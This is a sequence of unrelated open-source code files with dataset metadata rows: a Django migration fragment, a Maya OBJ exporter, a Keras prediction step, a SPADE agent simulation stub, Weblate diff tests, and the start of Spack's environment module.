'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'complejos.complejo': {
'Meta': {'object_name': 'Complejo'},
'direccion': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitud': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True', 'blank': 'True'}),
'longitud': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True', 'blank': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'telefono': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'equipos.equipo': {
'Meta': {'object_name': 'Equipo'},
'complejo_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['complejos.Complejo']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['equipos'] | mit | -1,342,480,729,113,450,200 | 66.873563 | 195 | 0.558435 | false |
mortentoo/maya | scripts/animvr/export_obj_sequence.py | 1 | 1035 | import pymel.core as pm
class ExportObjSequence:
def __init__(self):
self.objects = []
self.start_frame = None
self.end_frame = None
def export(self):
if not pm.ls(sl=True):
pm.warning("No objects selected")
return
path = pm.fileDialog2(fileFilter="*.obj", dialogStyle=2, fileMode=0,
dir=pm.workspace.path)
if not path:
return
path = path[0]
for f in range(self.start_frame, self.end_frame + 1):
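            # step through the frame range and export the current selection as one
            # numbered OBJ file per frame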
frame_path = ('%s_%04d.obj' % (path[:-4], f))
print frame_path
pm.currentTime(f)
pm.exportSelected(frame_path, force=True, options="groups=1;ptgroups=1;materials=0;smoothing=1;normals=1",
typ="OBJexport", preserveReferences=False, exportSelected=True)
if __name__ == '__main__':
eos = ExportObjSequence()
eos.start_frame = 1
eos.end_frame = 72
eos.export()
| gpl-3.0 | -4,551,239,341,659,585,500 | 27.75 | 118 | 0.523671 | false |
patrick-winter-knime/mol-struct-nets | molstructnets/steps/prediction/tensor2d/tensor_2d.py | 1 | 3072 | import h5py
from keras import models
import numpy
from steps.prediction.shared.tensor2d import prediction_array
from util import data_validation, file_structure, progressbar, logger, file_util, hdf5_util, misc
class Tensor2D:
@staticmethod
def get_id():
return 'tensor_2d'
@staticmethod
def get_name():
return 'Network (Grid)'
@staticmethod
def get_parameters():
parameters = list()
parameters.append({'id': 'batch_size', 'name': 'Batch Size', 'type': int, 'default': 100, 'min': 1,
'description': 'Number of data points that will be processed together. A higher number leads'
' to faster processing but needs more memory. Default: 100'})
parameters.append({'id': 'number_predictions', 'name': 'Predictions per data point', 'type': int, 'default': 1,
'min': 1, 'description': 'The number of times a data point is predicted (with different'
' transformations). The result is the mean of all predictions. Default: 1'})
return parameters
@staticmethod
def check_prerequisites(global_parameters, local_parameters):
data_validation.validate_preprocessed_specs(global_parameters)
data_validation.validate_network(global_parameters)
@staticmethod
def execute(global_parameters, local_parameters):
prediction_path = file_structure.get_prediction_file(global_parameters)
if file_util.file_exists(prediction_path):
logger.log('Skipping step: ' + prediction_path + ' already exists')
else:
array = prediction_array.PredictionArrays(global_parameters, local_parameters['batch_size'],
transformations=local_parameters['number_predictions'])
predictions = numpy.zeros((len(array.input), 2))
temp_prediction_path = file_util.get_temporary_file_path('tensor_prediction')
model_path = file_structure.get_network_file(global_parameters)
model = models.load_model(model_path)
logger.log('Predicting data')
chunks = misc.chunk_by_size(len(array.input), local_parameters['batch_size'])
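            # each transformation pass predicts every chunk once and accumulates the
            # outputs; the sums are averaged over the number of passes afterwards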
with progressbar.ProgressBar(len(array.input) * local_parameters['number_predictions']) as progress:
for iteration in range(local_parameters['number_predictions']):
for chunk in chunks:
predictions[chunk['start']:chunk['end']] += model.predict(array.input.next())[:]
progress.increment(chunk['size'])
predictions /= local_parameters['number_predictions']
array.close()
prediction_h5 = h5py.File(temp_prediction_path, 'w')
hdf5_util.create_dataset_from_data(prediction_h5, file_structure.Predictions.prediction, predictions)
prediction_h5.close()
file_util.move_file(temp_prediction_path, prediction_path)
| gpl-3.0 | -7,248,230,788,257,675,000 | 51.067797 | 128 | 0.623372 | false |
tomicic/ModelMMORPG | sc.py | 1 | 3434 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
from spade.Agent import BDIAgent
from spade.Behaviour import OneShotBehaviour, EventBehaviour, ACLTemplate, MessageTemplate
from spade.ACLMessage import ACLMessage
from spade.AID import aid
from spade.SWIKB import SWIKB as KB
Overflow = 0.00
'''
TODO:
Reimplement agents and their behaviours as in SSSHS, but add organizational units, see:
https://github.com/javipalanca/spade/blob/master/spade/Organization.py
https://github.com/javipalanca/spade/blob/master/spade/Organization_new.py
Implement communication via messaging.
Store data about agents state in knowledge base.
'''
class Report( OneShotBehaviour ):
''' Reporting behaviour to be added on the fly at the end of simulation with addBehaviour() '''
def _process( self ):
''' Print out the stats of all storages '''
''' TODO: Would be nice to produce some visualization on this '''
with self.myAgent:
totalInterventions = economyRequests + delayRequests + restoreEconomyRequests + advanceRequests + giveRequests + negotiationRequests
global Overflow
for s in storages:
Overflow += s.ResourceLoss
say( ".... [ END OF SIMULATION ] ...." )
say( "******* Number of system interventions: %d" % totalInterventions )
say( "*********** First intervention happened at time: %d" % firstIntervention )
say( "******* Number of LT ALERTS: %d" % LTalerts )
say( "*********** Number of DELAY requests: %d" % delayRequests )
say( "*********** Number of ECONOMY requests: %d" % economyRequests )
say( "*********** Number of NEGOTIATION requests: %d" % negotiationRequests )
say( "******* Number of UT ALERTS: %d" % UTalerts )
say( "*********** Number of RESTORE requests: %d" % restoreEconomyRequests )
say( "*********** Number of ADVANCE requests: %d" % advanceRequests )
say( "*********** Number of GIVE requests: %d" % giveRequests )
say( "*********** Overflow of resources: %f" % Overflow )
for s in storages:
say( "INDIVIDUAL REPORT FOR STORAGE %s" % s.name )
say( "- Capacity: %d" % s.maxCapacity )
say( "- CRL: %d" % s.currentResourceLevel )
say( "- UT alerts: %d" % s.myUTalerts )
say( "- Advance reqs: %d" % s.myAdvanceReqs )
say( "- Resources lost: %f" % s.ResourceLoss )
say( "- LT alerts: %d" % s.myLTalerts )
say( "- Economy reqs: %d" % s.myEconomyReqs )
say( "- Delay reqs: %d" % s.myDelayReqs )
say( "CRL HISTORY: %s" % s.CRLhistory )
say( "OVERFLOW per time unit: %s" % s.overflowHistory )
class TalkingAgent( BDIAgent ):
''' Agent that prints to the console
Abstract - only to be inherited by other agent classes
'''
def say( self, msg ):
''' Say something (e.g. print to console for debug purposes) '''
print '%s: %s' % ( self.name.split( '@' )[ 0 ], str( msg ) )
class Observer( TalkingAgent ):
''' Observer agent -- collects statstical data about all other agents '''
def _setup( self ):
''' Setup the agent's knowledge base '''
self.kb = KB()
self.report = Report()
class Storage( TalkingAgent ):
''' A storage in a settlement '''
def _setup( self ):
pass
class Consumer( TalkingAgent ):
''' A consumer in a settlement '''
def _setup( self ):
pass
class Producer( TalkingAgent ):
''' A producer in a settlement '''
def _setup( self ):
pass
if __name__ == '__main__':
''' Add simulation configuration here (e.g. number of agents, organizational units, hierarchy'''
pass
| gpl-3.0 | 5,696,110,524,052,965,000 | 33.686869 | 135 | 0.655213 | false |
lem9/weblate | weblate/trans/tests/test_diff.py | 1 | 2571 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2017 Michal Čihař <[email protected]>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from unittest import TestCase
from weblate.trans.simplediff import html_diff
from weblate.trans.templatetags.translations import format_translation
from weblate.trans.tests.test_checks import MockUnit, MockLanguage
class DiffTest(TestCase):
"""Testing of HTML diff function."""
def test_same(self):
self.assertEqual(
html_diff('first text', 'first text'),
'first text'
)
def test_add(self):
self.assertEqual(
html_diff('first text', 'first new text'),
'first <ins>new </ins>text'
)
def test_unicode(self):
self.assertEqual(
html_diff('zkouška text', 'zkouška nový text'),
'zkouška <ins>nový </ins>text'
)
def test_remove(self):
self.assertEqual(
html_diff('first old text', 'first text'),
'first <del>old </del>text'
)
def test_replace(self):
self.assertEqual(
html_diff('first old text', 'first new text'),
'first <del>old</del><ins>new</ins> text'
)
def test_format_diff(self):
unit = MockUnit(source='Hello word!')
self.assertEqual(
format_translation(
unit.source,
unit.translation.subproject.project.source_language,
diff='Hello world!',
)['items'][0]['content'],
'Hello wor<del>l</del>d!'
)
def test_fmtsearchmatch(self):
self.assertEqual(
format_translation(
'Hello world!',
MockLanguage('en'),
search_match='hello'
)['items'][0]['content'],
'<span class="hlmatch">Hello</span> world!'
)
| gpl-3.0 | 1,324,236,150,092,939,800 | 31.443038 | 72 | 0.608272 | false |
EnviDat/ckanext-envidat_theme | ckanext/envidat_theme/action.py | 1 | 3448 | # coding: utf8
from ckan.logic import side_effect_free
from ckan.logic.action.get import user_show
import ckan.plugins.toolkit as toolkit
from ckanext.passwordless import util
import json
from xml.etree import ElementTree
import requests
from logging import getLogger
log = getLogger(__name__)
@side_effect_free
def context_user_show(context, data_dict):
user = envidat_get_user_from_context(context)
if user:
return {'user': user}
else:
return {}
@side_effect_free
def envidat_get_author_data(context, data_dict):
user_data = get_author_data(context, data_dict)
return user_data
def envidat_get_user_from_context(context):
auth_user_obj = context.get('auth_user_obj', None)
if auth_user_obj:
auth_user_obj_dict = auth_user_obj.as_dict()
user_data = user_show(context, {'id': auth_user_obj_dict['id']})
auth_user_obj_dict["email_hash"] = user_data["email_hash"]
# renew the master key
apikey = util.renew_master_token(auth_user_obj_dict['name'])
auth_user_obj_dict["apikey"] = apikey
return auth_user_obj_dict
else:
return {}
def get_author_data(context, data_dict):
context['ignore_auth'] = True
email = data_dict.get('email', '').strip().lower()
if email:
try:
search_results = toolkit.get_action(
'package_search')(
context,
{'q': 'author:\"' + email + '\"',
'sort': 'metadata_modified desc'}
)
except Exception as e:
log.error("exception {0}".format(e))
return {}
author_data = {}
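    # merge the author entries matching this email across the returned datasets
    # (newest first) so that empty fields can be filled from older records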
if search_results.get('count', 0) > 0:
author_data_list = []
for dataset in search_results.get('results', []):
author_data_list += [a for a in json.loads(dataset.get('author'))
if a.get('email', '').strip().lower() == email]
# copy dictionary field by field including empty fields
author_data = {}
if author_data_list:
for k, v in author_data_list[0].items():
if v and len(v) > 0:
author_data[k] = "{0}".format(v).strip()
else:
author_data[k] = ""
# fill up empty fields from older datasets
for author in author_data_list:
for k, v in author.items():
if not author_data.get(k) or (len(author_data.get(k, "")) < 1):
# TODO skip affiliation
author_data[k] = "{0}".format(v).strip()
# TODO check if the orcid is empty request from ORCID API
# https://www.envidat.ch/orcid/search/?q=email:*@wsl.ch
if not author_data.get('identifier'):
author_data['identifier'] = get_orcid_id(email)
return author_data
return {}
def get_orcid_id(email):
try:
api_call = 'https://www.envidat.ch/orcid/search/?q=email:{0}'.format(email)
req = requests.get(api_call)
root = ElementTree.fromstring(req.content)
path = root.find(".//{http://www.orcid.org/ns/common}path")
orcid_id = path.text
return orcid_id
except AttributeError:
return ''
except Exception as e:
log.error('Failed to get orcid_id: {0}'.format(e))
return ''
| agpl-3.0 | -2,467,828,462,179,743,000 | 27.262295 | 84 | 0.555394 | false |
rbarlow/pulp_python | plugins/test/unit/plugins/importers/test_importer.py | 1 | 7890 | """
Contains tests for pulp_python.plugins.importers.importer.
"""
from gettext import gettext as _
import unittest
import mock
from pulp_python.common import constants
from pulp_python.plugins import models
from pulp_python.plugins.importers import importer
class TestEntryPoint(unittest.TestCase):
"""
Tests for the entry_point() function.
"""
def test_return_value(self):
"""
Assert the correct return value for the entry_point() function.
"""
return_value = importer.entry_point()
expected_value = (importer.PythonImporter, {})
self.assertEqual(return_value, expected_value)
class TestPythonImporter(unittest.TestCase):
"""
This class contains tests for the PythonImporter class.
"""
@mock.patch('pulp.server.controllers.repository.get_unit_model_querysets', spec_set=True)
@mock.patch('pulp.server.controllers.repository.associate_single_unit', spec_set=True)
def test_import_units_units_none(self, mock_associate, mock_get):
"""
Assert correct behavior when units == None.
"""
python_importer = importer.PythonImporter()
dest_repo = mock.MagicMock()
source_repo = mock.MagicMock()
units = ['unit_a', 'unit_b', 'unit_3']
mock_get.return_value = [units]
imported_units = python_importer.import_units(source_repo, dest_repo, mock.MagicMock(),
mock.MagicMock(), units=None)
mock_get.assert_called_once_with(source_repo.repo_obj.repo_id, models.Package)
# Assert that the units were associated correctly
associate_unit_call_args = [c[1] for c in mock_associate.mock_calls]
self.assertEqual(associate_unit_call_args, [(dest_repo.repo_obj, u) for u in units])
# Assert that the units were returned
self.assertEqual(imported_units, units)
@mock.patch('pulp.server.controllers.repository.associate_single_unit', spec_set=True)
def test_import_units_units_not_none(self, mock_associate):
"""
Assert correct behavior when units != None.
"""
python_importer = importer.PythonImporter()
dest_repo = mock.MagicMock()
units = ['unit_a', 'unit_b', 'unit_3']
imported_units = python_importer.import_units(mock.MagicMock(), dest_repo, mock.MagicMock(),
mock.MagicMock(), units=units)
# Assert that the units were associated correctly
associate_unit_call_args = [c[1] for c in mock_associate.mock_calls]
self.assertEqual(associate_unit_call_args, [(dest_repo.repo_obj, u) for u in units])
# Assert that the units were returned
self.assertEqual(imported_units, units)
def test_metadata(self):
"""
Test the metadata class method's return value.
"""
metadata = importer.PythonImporter.metadata()
expected_value = {
'id': constants.IMPORTER_TYPE_ID, 'display_name': _('Python Importer'),
'types': [constants.PACKAGE_TYPE_ID]}
self.assertEqual(metadata, expected_value)
@mock.patch('pulp_python.plugins.importers.importer.shutil.rmtree')
@mock.patch('pulp_python.plugins.importers.importer.sync.SyncStep.__init__')
@mock.patch('pulp_python.plugins.importers.importer.sync.SyncStep.sync')
@mock.patch('pulp_python.plugins.importers.importer.tempfile.mkdtemp')
def test_sync_repo_failure(self, mkdtemp, sync, __init__, rmtree):
"""
Test the sync_repo() method when the sync fails.
"""
config = mock.MagicMock()
python_importer = importer.PythonImporter()
repo = mock.MagicMock()
sync_conduit = mock.MagicMock()
# Fake the sync raising some bogus error
sync.side_effect = IOError('I/O error, lol!')
__init__.return_value = None
try:
python_importer.sync_repo(repo, sync_conduit, config)
except IOError as e:
# Make sure the error was passed on as it should have been
self.assertEqual(str(e), 'I/O error, lol!')
# A temporary working dir should have been created in the repo's working dir
mkdtemp.assert_called_once_with(dir=repo.working_dir)
# No matter what happens, it's important that we cleaned up the temporary dir
rmtree.assert_called_once_with(mkdtemp.return_value, ignore_errors=True)
# Make sure the SyncStep was initialized correctly
__init__.assert_called_once_with(repo=repo, conduit=sync_conduit, config=config,
working_dir=mkdtemp.return_value)
# Make sure all the right args were passed on to sync()
sync.assert_called_once_with()
@mock.patch('pulp_python.plugins.importers.importer.shutil.rmtree')
@mock.patch('pulp_python.plugins.importers.importer.sync.SyncStep.__init__')
@mock.patch('pulp_python.plugins.importers.importer.sync.SyncStep.sync')
@mock.patch('pulp_python.plugins.importers.importer.tempfile.mkdtemp')
def test_sync_repo_success(self, mkdtemp, sync, __init__, rmtree):
"""
Test the sync_repo() method when the sync is successful.
"""
config = mock.MagicMock()
python_importer = importer.PythonImporter()
repo = mock.MagicMock()
sync_conduit = mock.MagicMock()
sync_report = mock.MagicMock()
sync.return_value = sync_report
__init__.return_value = None
return_value = python_importer.sync_repo(repo, sync_conduit, config)
# A temporary working dir should have been created in the repo's working dir
mkdtemp.assert_called_once_with(dir=repo.working_dir)
# No matter what happens, it's important that we cleaned up the temporary dir
rmtree.assert_called_once_with(mkdtemp.return_value, ignore_errors=True)
# Make sure the SyncStep was initialized correctly
__init__.assert_called_once_with(repo=repo, conduit=sync_conduit, config=config,
working_dir=mkdtemp.return_value)
# Make sure all the right args were passed on to sync()
sync.assert_called_once_with()
# And, of course, assert that the sync report was returned
self.assertEqual(return_value, sync_report)
@mock.patch('pulp.server.controllers.repository.rebuild_content_unit_counts', spec_set=True)
@mock.patch('pulp.server.controllers.repository.associate_single_unit', spec_set=True)
@mock.patch('pulp_python.plugins.models.Package.from_archive')
def test_upload_unit(self, from_archive, mock_associate, mock_rebuild):
"""
Assert correct operation of upload_unit().
"""
package = from_archive.return_value
python_importer = importer.PythonImporter()
repo = mock.MagicMock()
type_id = constants.PACKAGE_TYPE_ID
unit_key = {}
metadata = {}
file_path = '/some/path/1234'
conduit = mock.MagicMock()
config = {}
report = python_importer.upload_unit(repo, type_id, unit_key, metadata, file_path, conduit,
config)
self.assertEqual(report, {'success_flag': True, 'summary': {}, 'details': {}})
from_archive.assert_called_once_with(file_path)
package.save_and_import_content.assert_called_once_with(file_path)
mock_associate.assert_called_once_with(repo.repo_obj, package)
def test_validate_config(self):
"""
There is no config, so we'll just assert that validation passes.
"""
python_importer = importer.PythonImporter()
return_value = python_importer.validate_config(mock.MagicMock(), {})
expected_value = (True, '')
self.assertEqual(return_value, expected_value)
| gpl-2.0 | -8,726,490,154,107,941,000 | 42.833333 | 100 | 0.641825 | false |
Aiacos/DevPyLib | mayaLib/guiLib/base/baseUI.py | 1 | 6497 | __author__ = 'Lorenzo Argentieri'
import inspect
import ast
import mayaLib.pipelineLib.utility.docs as doc
from PySide2 import QtCore, QtWidgets
import pymel.core as pm
def test(a, b, c, d='ciao', e='stronzo', f=1):
"""
Test Function
:param a:
:param b:
:param c:
:param d:
:param e:
:param f:
:return:
"""
print a, b, c, d, e, f
class Prova():
def __init__(self, ciccia, pupu=2048):
print 'Questa e una prova'
def motodo(self):
print 'test method'
class FunctionUI(QtWidgets.QWidget):
def __init__(self, func, parent=None):
super(FunctionUI, self).__init__(parent)
self.function = func
if inspect.isclass(func):
self.sig = inspect.getargspec(func.__init__)
else:
self.sig = inspect.getargspec(func)
self.layout = QtWidgets.QGridLayout()
self.args = self.getParameterList()
self.label_list = []
self.lineedit_list = []
self.fillButton_list = []
row = 0
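        # build one row per function argument: a name label, a '>' button that fills
        # the field from the current Maya selection, and an input widget (a checkbox
        # for boolean defaults, a line edit otherwise)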
for arg in self.args:
if arg[0] != 'self':
labelname = QtWidgets.QLabel(arg[0])
if arg[1] != None:
if isinstance(arg[1], bool):
lineedit = QtWidgets.QCheckBox('')
lineedit.setChecked(arg[1])
else:
lineedit = QtWidgets.QLineEdit(str(arg[1]))
fillButton = QtWidgets.QPushButton(">")
else:
lineedit = QtWidgets.QLineEdit("")
fillButton = QtWidgets.QPushButton(">")
self.layout.addWidget(labelname, row, 0)
self.label_list.append(labelname)
if fillButton:
self.layout.addWidget(fillButton, row, 1)
self.fillButton_list.append(fillButton)
self.layout.addWidget(lineedit, row, 2)
self.lineedit_list.append(lineedit)
row = row + 1
self.execButton = QtWidgets.QPushButton("Execute")
self.advancedCheckBox = QtWidgets.QCheckBox("Advanced")
self.advancedCheckBox.setChecked(False)
self.toggleDefaultParameter(False)
self.layout.addWidget(self.execButton, row, 2)
self.layout.addWidget(self.advancedCheckBox, row, 0)
self.doclabel = QtWidgets.QLabel(doc.getDocs(func))
self.layout.addWidget(self.doclabel, row + 1, 2)
self.setLayout(self.layout)
# self.connect(self.execButton, QtCore.Signal("clicked()"), self.execFunction) # Deprecated
self.execButton.clicked.connect(self.execFunction)
self.advancedCheckBox.stateChanged.connect(self.toggleDefaultParameter)
for button in self.fillButton_list:
button.clicked.connect(self.fillWithSelected)
self.setWindowTitle(func.__name__)
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
self.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)
self.setFocus()
def fillWithSelected(self):
button = self.sender()
selection_list = pm.ls(sl=True)
index = self.fillButton_list.index(button)
lineedit = self.lineedit_list[index]
text_list = []
for item in selection_list:
text_list.append(str(item))
lineedit.setText(', '.join(text_list))
def getParameterList(self):
args = self.sig.args
if len(args) == 0:
return []
varargs = self.sig.varargs
keywords = self.sig.keywords
defaults = self.sig.defaults
if not defaults:
defaults = []
argspairs = []
argslen = len(args)
deflen = len(defaults)
counter = 0
defcount = 0
for arg in args:
if counter < (argslen - deflen):
defval = None
else:
defval = defaults[defcount]
defcount = defcount + 1
counter = counter + 1
pair = [arg, defval]
argspairs.append(pair)
return argspairs
# SLOTS
def toggleDefaultParameter(self, defaultvisible=False):
counter = 0
for arg in self.args:
if arg[0] != 'self':
if defaultvisible:
# show
if arg[1] != None:
self.label_list[counter].show()
self.lineedit_list[counter].show()
self.fillButton_list[counter].show()
else:
# hide
if arg[1] != None:
self.label_list[counter].hide()
self.lineedit_list[counter].hide()
self.fillButton_list[counter].hide()
counter = counter + 1
def execFunction(self):
param_list = []
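        # convert each widget value back to a Python type (bool, list, number, None
        # or string) before passing it on to the wrapped function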
for param in self.lineedit_list:
value = param.text()
if isinstance(param, QtWidgets.QCheckBox):
if param.isChecked():
qCheckBoxValue = True
else:
qCheckBoxValue = False
value = qCheckBoxValue
param_list.append(value)
elif '[' in value and ']' in value:
value = value.replace('[', '').replace(']', '').replace("'", "").replace(' ', '').split(',')
param_list.append(value)
elif value.replace('.', '', 1).isdigit():
value = ast.literal_eval(value)
param_list.append(value)
elif value == 'True':
value = True
param_list.append(value)
elif value == 'False':
value = False
param_list.append(value)
elif value == '':
value = None
param_list.append(value)
elif ', ' in value:
value = value.split(', ')
param_list.append(value)
else:
param_list.append(value)
self.wrapper(param_list)
def wrapper(self, args):
self.function(*args)
if __name__ == "__main__":
# app = QtWidgets.QApplication.instance()
# button = QtWidgets.QPushButton("Hello World")
# button.show()
# app.exec_()
#print inspect.getargspec(Prova)
t = FunctionUI(Prova)
t.show()
| agpl-3.0 | -574,755,296,216,365,000 | 29.502347 | 108 | 0.52732 | false |
marco-lancini/Showcase | app_socialnetworks/tumblr.py | 1 | 7041 | from __init__ import *
from oauthclient import *
class TumblrClient(OauthClient):
"""
Wrapper for Tumblr APIs
:CONSUMER_KEY: Tumblr App ID
:CONSUMER_SECRET: Tumblr API Secret
:blog: the connected Tumblr blog, if any
:user_auth: account of the user on Showcase
:auth: boolean flag (if True, the operation needs to be authenticated)
.. seealso:: :class:`app_socialnetworks.oauthclient.OauthClient`
"""
CONSUMER_KEY = setting('TUMBLR_CONSUMER_KEY')
CONSUMER_SECRET = setting('TUMBLR_CONSUMER_SECRET')
request_token_url = 'http://www.tumblr.com/oauth/request_token'
authorize_url = 'http://www.tumblr.com/oauth/authorize'
access_token_url = 'http://www.tumblr.com/oauth/access_token'
def __init__(self, blog, user_auth=False, auth=False):
"""
        Instantiate the client: if authentication is needed, proceed with Oauth; otherwise, use a simple HTTP client
:param blog: the connected Tumblr blog, if any
:type blog: string
:param user_auth: account of the user on Showcase
:type user_auth: `User`
:param auth: flag (if True, the operation needs to be authenticated)
:type auth: boolean
"""
self.blog = blog
self.user_auth = user_auth
self.auth = auth
if self.auth:
# Authentication needed, proceed with Oauth
super(TumblrClient, self).__init__(self.CONSUMER_KEY, self.CONSUMER_SECRET)
else:
# Use a simple HTTP client
self.client = httplib2.Http()
def request_token(self, consumer):
"""
Retrieve the access token of the user from his connected accounts data
"""
# Retrieve connected accounts
connected_accounts = self.user_auth.social_auth.filter(user=self.user_auth.id).filter(provider="tumblr")
if len(connected_accounts) == 0:
raise NotConnectedException('Not Connected to Tumblr')
# Retrieve access_token from socialauth
access_token = connected_accounts[0].extra_data['access_token']
access_token = urlparse.parse_qs(access_token)
oauth_token = access_token['oauth_token'][0]
oauth_token_secret = access_token['oauth_token_secret'][0]
return oauth_token, oauth_token_secret
#=========================================================================
# READ
#=========================================================================
def _query(self, method, optionals=None):
"""
Execute a read-only query
"""
url = "http://api.tumblr.com/v2/blog/%s.tumblr.com/%s?api_key=%s" % (self.blog, method, self.CONSUMER_KEY)
if optionals:
url += optionals
try:
resp, content = self.client.request(url, "GET")
content = json.loads(content)['response']
return content
except:
return None
def get_blog_info(self):
"""
Get general infos about the connected blog
"""
method = "info"
return self._query(method)
def get_blog_posts(self):
"""
Fetch last 5 blog posts
"""
method = "posts"
optionals = "&limit=5"
posts = self._query(method, optionals)
if posts:
posts = posts['posts']
for p in posts:
temp = datetime.strptime(p['date'], "%Y-%m-%d %H:%M:%S GMT")
p['date'] = temp.strftime("%d %B %Y")
return posts
else:
return None
#=========================================================================
# WRITE
#=========================================================================
def _post_blog(self, params, media=None):
"""
Execute a write query
"""
url = 'http://api.tumblr.com/v2/blog/%s.tumblr.com/post' % self.blog
if media:
content = self._postOAuth(url, params)
content = content.read()
else:
body = urllib.urlencode(params)
resp, content = self.client.request(url, "POST", body=body)
# Check response
content = json.loads(content)
response = content['meta']['msg']
if response:
if response != 'Created':
if response == 'Not Authorized':
raise ClearanceException("Not an owned blog")
else:
raise UploadException("Error During Upload: %s" % response)
else:
raise UploadException("Error During Upload: %s" % response)
def add_text(self, title, body):
"""
Add a blog of type: *text*
:param title: title of the blog post
:type title: string
:param body: content of the blog post
:type body: string
"""
params = {'type': 'text', 'title': title, 'body': body}
return self._post_blog(params)
def add_link(self, title, url):
"""
Add a blog of type: *link*
:param title: title of the blog post
:type title: string
:param url: url of the link to publish
:type url: string
"""
params = {'type': 'link', 'title': title, 'url': url}
return self._post_blog(params)
def add_quote(self, quote):
"""
Add a blog of type: *quote*
:param quote: quote to publish
:type quote: string
"""
params = {'type': 'quote', 'quote': quote}
return self._post_blog(params)
def add_chat(self, title, conversation):
"""
Add a blog of type: *chat*
:param title: title of the blog post
:type title: string
:param conversation: conversation to publish
:type conversation: string
"""
params = {'type': 'chat', 'title': title, 'conversation': conversation}
return self._post_blog(params)
def add_photo(self, source, photo):
"""
Add a blog of type: *photo*
:param source: url of the photo to publish, if any
:type source: string
:param photo: photo to upload, if any
:type photo: image file
"""
if source:
params = {'type': 'photo', 'source': source}
return self._post_blog(params)
elif photo:
params = {'type': 'photo', 'data[0]': photo.read()}
return self._post_blog(params, media=True)
def add_audio(self, source):
"""
Add a blog of type: *audio*
:param source: url of the audio file to publish
:type source: string
"""
if source:
params = {'type': 'audio', 'external_url': source}
return self._post_blog(params)
# def add_video(self, video):
# params = {'type': 'video', 'data[0]': video.read()}
# return self._post_blog(params, media=True)
| mit | -552,312,351,703,994,600 | 30.017621 | 115 | 0.530464 | false |
rspavel/spack | lib/spack/spack/environment.py | 1 | 68581 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import collections
import os
import re
import sys
import shutil
import copy
import socket
import six
from ordereddict_backport import OrderedDict
import llnl.util.filesystem as fs
import llnl.util.tty as tty
from llnl.util.tty.color import colorize
import spack.concretize
import spack.error
import spack.hash_types as ht
import spack.repo
import spack.schema.env
import spack.spec
import spack.store
